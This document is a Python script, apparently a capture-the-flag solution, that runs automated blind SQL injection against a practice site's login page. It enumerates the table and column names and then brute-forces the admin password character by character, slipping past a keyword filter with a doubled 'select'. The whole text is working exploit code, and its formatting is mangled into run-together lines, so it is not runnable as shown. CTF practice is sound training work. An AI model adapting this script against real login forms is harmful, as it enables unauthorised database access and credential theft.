defgetTlen(): Tlen = 0 for l in range(1,31): r = session.get(url + "?admin=admin%27%20and%20length((seselectlect%20table_name%20from%20information_schema.tables%20where%20table_schema=database()))={};--%20-&pass=&action=login".format(l)) r.encoding = 'gbk' if r.text.find('登录失败,错误的用户名和密码') >=0: Tlen = l break return Tlen
defgetT(): Tlen = getTlen() #print("Tlen:",Tlen) Tname = "" for i in range(1,Tlen+1): for p in payload: r = session.get(url + "?admin=admin' and mid((seselectlect table_name from information_schema.tables where table_schema=database()),{},1)='{}';-- -&pass=&action=login".format(i,p)) r.encoding = 'gbk' if r.text.find('登录失败,错误的用户名和密码') >=0: Tname = Tname + p break return Tname
defgetClen(Tname): Clen=[] for n in range(0,2): i = 1 while i > 0: r = session.get(url + "?admin=admin' and length((seselectlect column_name from information_schema.columns where table_schema=database() and table_name='{}' limit {},1))={};-- -&pass=&action=login".format(Tname,n,i)) r.encoding = 'gbk' if r.text.find('登录失败,错误的用户名和密码') >=0: Clen.append(i) break i = i + 1
return Clen
defgetC(Tname): Clen = getClen(Tname) #print("Clens:",Clen) Cnames = ['',''] for n in range(0,2): for i in range(1, Clen[n]+1): for p in payload: r = session.get(url + "?admin=admin' and mid((seselectlect column_name from information_schema.columns where table_schema=database() and table_name='{}' limit {},1),{},1)='{}';-- -&pass=&action=login".format(Tname,n,i,p)) r.encoding = 'gbk' if r.text.find('登录失败,错误的用户名和密码') >=0: Cnames[n] = Cnames[n] + p break return Cnames defgetPlen(Tname, Cname): i = 1 while i > 0: r = session.get(url + "?admin=admin' and length((seselectlect {} from {}))={};-- -&pass=&action=login".format(Cname, Tname, i)) r.encoding = 'gbk' if r.text.find('登录失败,错误的用户名和密码') >= 0: #print("Plen:",i) return i i = i + 1
defgetPwd(): Tname = getT() Cnames = getC(Tname) #由于这道题很明显username是admin,这里就不去爆破username的值了 Plen = getPlen(Tname, Cnames[1]) pwd = "" for i in range(1,Plen+1): for p in payload: r = session.get(url + "?admin=admin' and mid((seselectlect {} from {}),{},1)='{}';-- -&pass=&action=login".format(Cnames[1], Tname, i, p)) r.encoding = 'gbk' if r.text.find('登录失败,错误的用户名和密码') >= 0: pwd = pwd + p break return pwd
defmain(): global url global session global payload url = 'http://ctf5.shiyanbar.com/basic/inject/index.php' session = requests.Session() payload = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_,:-{}'" print("admin:",getPwd())